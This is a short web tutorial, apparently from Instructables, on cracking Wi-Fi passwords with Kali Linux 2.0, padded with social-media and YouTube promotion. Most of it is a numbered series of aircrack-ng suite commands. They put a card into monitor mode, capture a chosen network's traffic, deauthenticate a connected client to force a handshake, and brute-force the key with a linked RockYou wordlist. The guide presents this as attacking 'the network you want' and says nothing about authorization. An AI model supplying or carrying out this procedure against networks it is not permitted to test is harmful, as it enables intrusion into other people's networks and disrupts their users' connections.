How to Hack a Wifi Using Kali Linux 2.0

by TechJoint in Circuits > Linux

137512 Views, 76 Favorites, 0 Comments

How to Hack a Wifi Using Kali Linux 2.0

THUMBNAIL.png

How to hack a wifi using kali linux 2.0. This tutorial l will show you how to crack wifi passwords using a wordlist in Kali Linux 2.0.

Check How to Hack It

How To Hack A Wifi Using Kali Linux 2.0

Steps

Feel Free To Leave A Comment & Suggestions( Eg. Videos and Instructables You Want Me To Make). Enjoy!!

Wordlist RockYou : http://www.mediafire.com/view/7d7nz2kku7urzor/roc...

Awesome Wearable Gadgets You Must Have https://www.youtube.com/watch?v=6v1G1lIWzsU

Watch The Video On Hacking Wifi.

Steps: (Enter These Commands In the terminal)

1. airmon-ng check kill (To stop processes that might ).

2. airmon-ng (To show your wireless cards).

3. airmon-ng start [monitor interface] (Puts the card into monitor mode).

4. airodump-ng [monitor interface] (Shows wireless networks in your area).

5. airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface] (Monitors the network you want to attack).

6. aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface] (Disconnects a connected client to get a handshake when it connects again).

7. aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap (This will start cracking the password).

DON'T FORGET TO SUBSCRIBE FOR TECH TUTORIALS.

Youtube Channel : https://goo.gl/vIB0oA

Insstructable On How To Make A Persistence Bootable USB

Follow Me On Twitter : https://twitter.com/techjoint_

Like My Awesome Computer And Hacking Tricks Facebook Page : https://goo.gl/JXOP2m

Thanks.

Techjoint_